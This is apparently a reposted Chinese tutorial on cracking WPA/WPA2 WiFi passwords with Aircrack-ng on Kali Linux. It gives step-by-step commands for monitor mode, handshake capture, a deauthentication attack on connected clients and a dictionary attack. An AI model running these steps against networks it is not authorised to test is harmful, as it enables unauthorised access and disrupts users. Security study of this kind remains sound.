Kali系统使用Aircrack-ng进行暴力破解WIFI密码

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Kali系统使用Aircrack-ng进行暴力破解WIFI密码相关的知识,希望对你有一定的参考价值。

参考技术A

Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站)并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux和Windows上。Linux版本已经被移植到了Zaurus和Maemo系统平台, 并概念验证可移植到iPhone。

使用Kali 2021.3进行演示操作
软件: aircrack-ng (Kali系统内置)
外置无线网卡设备: 要支持监听,支持Linux并且免驱(我这里使用的是RT3070)

命令: <code>sudo su</code>
解释: 不在管理员模式下运行可能会有权限不够的提示

命令: <code>iwconfig/ifconfig</code>
解释: iwconfig查看网卡的信息、ifconfig查看新连接的设备
wlan0就是我们的无线网卡

命令: <code>airmon-ng check kill</code>
解释: 杀死进程可以让搜索更准确,不会受到影响

命令: <code>airmon-ng</code>
出现你的网卡信息就说明你的网卡支持监听

命令: <code>airmon-ng start wlan0</code>
解释: start 开启哪个接口 wlan0 是接口的名字

再用iwconfig查看一下网卡信息,wlan0后面多了个mon,wlan0mon就说明已经开启监听了

命令: <code>airodump-ng wlan0mon</code>
解释: BSSID:WIFI的MAC地址、PWR:信号强度(值越小信号强度强)、Data:监听期间流量总合、CH:信道、ENC:加密算法、ESSID:WIFI名称

命令: <code>airodump-ng -c (频道号) --bssid (MAC地址) -w (抓取的数据包的保存位置) wlan0mon</code>
解释:

我要破解的目标网络是Test,CH(信道)是11,MAC地址是E2:D4:64:02:73:A8,我在根目录下创建了一个名为1的文件夹
输入命令: airodump-ng -c 11 --bssid E2:D4:64:02:73:A8 -w 1/ wlan0mon

当新的客户端连接时,客户端输入密码连接就可以抓到握手包,右上角出现WPA时就表示已经抓到了对方的握手包

命令: <code>aireplay-ng -o 2 -a BSSID(MAC地址) -c STATION wlan0mon</code>
解释:

执行命令<code>aireplay-ng -o 2 -a E2:D4:64:02:73:A8 -c C8:94:02:6D:93:F3 wlan0mon</code>
捕捉到握手包时就停止攻击

命令: <code>aircrack-ng -a2 -b E2:D4:64:02:73:A8 -w 字典.txt 1/-01.cap</code>
解释:

最后就是等待跑字典了,下面就是破解的WIFI密码

命令: <code>airmon-ng stop wlan0mon</code>
在监听模式下,kali不能连接网络

插入网卡,如果查看不到网卡信息,可以点开连接WIFI看一下能否搜索到附近的网络,如果不行那就右键系统可移动设备-把网卡断开再重新连接一下

插入网卡,打开网卡的监听模式,搜索附近的WIFI,获取握手包,最后跑字典破解握手包,这里给大家提供一个常用的密码字典

以上是关于Kali系统使用Aircrack-ng进行暴力破解WIFI密码的主要内容,如果未能解决你的问题,请参考以下文章

Kali之aircrack-ng

aircrack-ng+crunch暴力破解WIFI密码

用kali linux抓取wifi握手包并暴力破解

使用kali Hydra暴力破解phpadmin网站(失败)

Kali暴力破解Wifi密码完整步骤(学习记录)

Linux主机密码暴力破解